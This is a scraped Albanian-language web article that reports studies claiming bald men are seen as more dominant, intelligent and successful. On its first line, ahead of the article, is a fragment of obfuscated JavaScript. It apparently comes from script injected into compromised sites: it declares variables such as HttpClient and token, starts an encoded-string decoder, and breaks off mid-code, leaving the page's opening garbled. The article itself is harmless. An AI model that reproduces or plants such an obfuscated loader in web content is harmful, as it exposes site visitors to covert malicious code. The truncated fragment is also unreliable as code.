;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Djemtë tullacë janë më inteligjentë dhe më të suksesshëm, thotë studimi

By

Për shumë meshkuj, tullaciteti mund të jetë një temë e ndjeshme, sepse njerëzit tullacë mund të ndihen sikur kjo i bën më pak tërheqës dhe mashkullorë. Megjithatë, nuk ka asnjë arsye që ata të ndihen në këtë mënyrë.

Burrat tullac perceptohen më shpesh si të sigurt, të zgjuar dhe dominues. Ndoshta ky nuk është një zëvendësim i keq për një kokë të plotë flokësh.

Bright Side shkruan se i inkurajon të gjithë që ta pranojnë veten ashtu siç janë dhe dëshmon se tiparet fizike jokonvencionale mund t’ju sjellin përfitime të mëdha.

Djemtë tullac perceptohen të jenë më dominues nga ana sociale

Një studim i kryer nga profesor Dr. Frank Muscarella nga Universiteti Barry tregoi se meshkujt tullacë perceptohen si më dominues në shoqëri në krahasim me meshkujt e tjerë. Studiuesit zbuluan se megjithëse njerëzit i shohin meshkujt me flokë si më tërheqës fizikisht, burrat tullacë kanë më shumë gjasa të perceptohen si me status më të lartë shoqëror: njerëzit pohuan se i shohin ata si më dominues dhe superiorë, por nuk ndjejnë ndonjë kërcënim në krahasimi me meshkujt me flokë.

Gjatë hulumtimit, Dr. Frank Muscarella i kërkoi fokus grupit të vlerësonte pjesëmarrësit meshkuj në përputhje me 4 kritere: atraktiviteti, agresiviteti, qetësia dhe pjekuria. Disa njerëzve iu shfaqën fotot e meshkujve që e kishin kokën plot me flokë dhe pjesa tjetër e grupit pa fotot e të njëjtëve meshkuj por me flokët e hequr tërësisht në mënyrë digjitale. Rezultatet dolën të ishin mjaft të papritura: meshkujt tullacë u vlerësuan si më të ndershëm, inteligjentë dhe më mashkullorë.

Disa studime kanë vërtetuar se këto rezultate janë të sakta

Gjetjet e Dr. Frank Muscarella u mbështetën nga një hulumtim i Universitetit të Pensilvanisë. Psikologu Albert E. Mannes vërtetoi se njerëzit priren t’i shohin burrat tullacë si më të fortë, më dominues dhe të suksesshëm.

Meshkujt tullacë nuk perceptohen vetëm si të fortë dhe seksi, por edhe si të zgjuar. Studiuesit nga Universiteti i Saarland analizuan të dhënat e bazuara në sondazhin e opinionit të 20 mijë njerëzve. Rezultatet treguan se meshkujt tullacë më shpesh perceptohen si më të moshuar, por njerëzit i shohin ata si më të mençur dhe më inteligjentë.

Por të kesh pjesë të vogla tullace dhe disa flokë nuk do të ndikojë në këtë truk

Meshkujt duhet të jenë tërësisht tullacë në mënyrë që të perceptohen në këtë mënyrë. Hulumtimi tregoi se burrat që kishin disa pjesë tullace në kokë, përkundrazi perceptoheshin si të dobët dhe më pak mashkullorë. Mund të lidhet me faktin se rruajtja e kokës mund të perceptohet si një deklaratë aktive, duke u dhënë të tjerëve një ndjenjë se burri e ka situatën nën kontroll dhe se nuk ka turp për pamjen e tij. Dhe kjo është tërheqëse!

Artikuj të ngjashëm